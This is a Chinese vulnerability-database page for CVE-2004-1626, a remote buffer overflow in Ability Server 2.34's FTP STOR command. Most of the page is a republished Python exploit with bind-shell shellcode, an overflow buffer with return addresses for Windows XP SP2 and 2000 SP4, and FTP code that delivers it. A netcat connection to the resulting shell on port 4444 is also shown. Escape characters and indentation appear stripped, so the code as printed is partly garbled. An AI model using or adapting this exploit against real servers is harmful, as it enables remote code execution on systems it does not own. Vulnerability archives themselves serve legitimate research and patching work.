Code-Crafters Ability Server FTP STOR和APPE参数远程缓冲区溢出漏洞-安全小百科

Code-Crafters Ability Server FTP STOR和APPE参数远程缓冲区溢出漏洞

漏洞ID	1108236	漏洞类型	缓冲区溢出
发布时间	2004-10-21	更新时间	2005-10-20
CVE编号	CVE-2004-1626	CNNVD-ID	CNNVD-200410-087
漏洞平台	Windows	CVSS评分	5.0

|漏洞来源

https://www.exploit-db.com/exploits/588
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200410-087

|漏洞详情

AbilityServer2.34版本及其他可能的版本中存在缓冲区溢出漏洞。远程攻击者可以借助超长的STOR命令执行任意代码。

|漏洞EXP

###################################
# Ability Server 2.34 FTP STOR Buffer Overflow   #
# Advanced, secure and easy to use FTP Server. #
# 21 Oct 2004 - muts                                      #
###################################
# D:BO>ability-2.34-ftp-stor.py                       #
###################################
# D:datatools>nc -v 127.0.0.1 4444               #
# localhost [127.0.0.1] 4444 (?) open               #
# Microsoft Windows XP [Version 5.1.2600]        #
# (C) Copyright 1985-2001 Microsoft Corp.        #
# D:Program Filesabilitywebserver>                #
###################################

import ftplib
from ftplib import FTP
import struct
print "nn################################"
print "nAbility Server 2.34 FTP STOR buffer Overflow"
print "nFound & coded by muts [at] whitehat.co.il"
print "nFor Educational Purposes Only!n" 
print "###################################"

# Shellcode taken from Sergio Alvarez's "Win32 Stack Buffer Overflow Tutorial"

sc = "xd9xeexd9x74x24xf4x5bx31xc9xb1x5ex81x73x17xe0x66"
sc += "x1cxc2x83xebxfcxe2xf4x1cx8ex4axc2xe0x66x4fx97xb6"
sc += "x31x97xaexc4x7ex97x87xdcxedx48xc7x98x67xf6x49xaa"
sc += "x7ex97x98xc0x67xf7x21xd2x2fx97xf6x6bx67xf2xf3x1f"
sc += "x9ax2dx02x4cx5exfcxb6xe7xa7xd3xcfxe1xa1xf7x30xdb"
sc += "x1ax38xd6x95x87x97x98xc4x67xf7xa4x6bx6ax57x49xba"
sc += "x7ax1dx29x6bx62x97xc3x08x8dx1exf3x20x39x42x9fxbb"
sc += "xa4x14xc2xbex0cx2cx9bx84xedx05x49xbbx6ax97x99xfc"
sc += "xedx07x49xbbx6ex4fxaax6ex28x12x2ex1fxb0x95x05x61"
sc += "x8ax1cxc3xe0x66x4bx94xb3xefxf9x2axc7x66x1cxc2x70"
sc += "x67x1cxc2x56x7fx04x25x44x7fx6cx2bx05x2fx9ax8bx44"
sc += "x7cx6cx05x44xcbx32x2bx39x6fxe9x6fx2bx8bxe0xf9xb7"
sc += "x35x2ex9dxd3x54x1cx99x6dx2dx3cx93x1fxb1x95x1dx69"
sc += "xa5x91xb7xf4x0cx1bx9bxb1x35xe3xf6x6fx99x49xc6xb9"
sc += "xefx18x4cx02x94x37xe5xb4x99x2bx3dxb5x56x2dx02xb0"
sc += "x36x4cx92xa0x36x5cx92x1fx33x30x4bx27x57xc7x91xb3"
sc += "x0ex1exc2xf1x3ax95x22x8ax76x4cx95x1fx33x38x91xb7"
sc += "x99x49xeaxb3x32x4bx3dxb5x46x95x05x88x25x51x86xe0"
sc += "xefxffx45x1ax57xdcx4fx9cx42xb0xa8xf5x3fxefx69x67"
sc += "x9cx9fx2exb4xa0x58xe6xf0x22x7ax05xa4x42x20xc3xe1"
sc += "xefx60xe6xa8xefx60xe6xacxefx60xe6xb0xebx58xe6xf0"
sc += "x32x4cx93xb1x37x5dx93xa9x37x4dx91xb1x99x69xc2x88"
sc += "x14xe2x71xf6x99x49xc6x1fxb6x95x24x1fx13x1cxaax4d"
sc += "xbfx19x0cx1fx33x18x4bx23x0cxe3x3dxd6x99xcfx3dx95"
sc += "x66x74x32x6ax62x43x3dxb5x62x2dx19xb3x99xccxc2"

# Change RET address if need be.

#buffer = 'x41'*966+struct.pack('<L', 0x7C2FA0F7)+'x42'*32+sc # RET Windows 2000 Server SP4
buffer = 'x41'*970+struct.pack('<L', 0x7D17D737)+'x42'*32+sc # RET Windows XP SP2

try:
# Edit the IP, Username and Password.
ftp = FTP('127.0.0.1') 
ftp.login('ftp','ftp')
print "nEvil Buffer sent..."
print "nSploit will hang now because I couldn't figure how to use storelines()."
print "nTry connecting with netcat to port 4444 on the remote machine."
except:
print "nCould not Connect to FTP Server."
try:
ftp.transfercmd("STOR " + buffer) 
except:
print "nDone."

# milw0rm.com [2004-10-21]

|参考资料

来源:US-CERTVulnerabilityNote:VU#857846
名称:VU#857846
链接:http://www.kb.cert.org/vuls/id/857846
来源:XF
名称:abilityftpserver-stor-dos(17823)
链接:http://xforce.iss.net/xforce/xfdb/17823
来源:BID
名称:11508
链接:http://www.securityfocus.com/bid/11508
来源:OSVDB
名称:11030
链接:http://www.osvdb.org/11030
来源:SECUNIA
名称:12941
链接:http://secunia.com/advisories/12941
来源:BUGTRAQ
名称:20041022AbilityFTPServer2.34BufferOverflowExploit
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=109850947508816&w;=2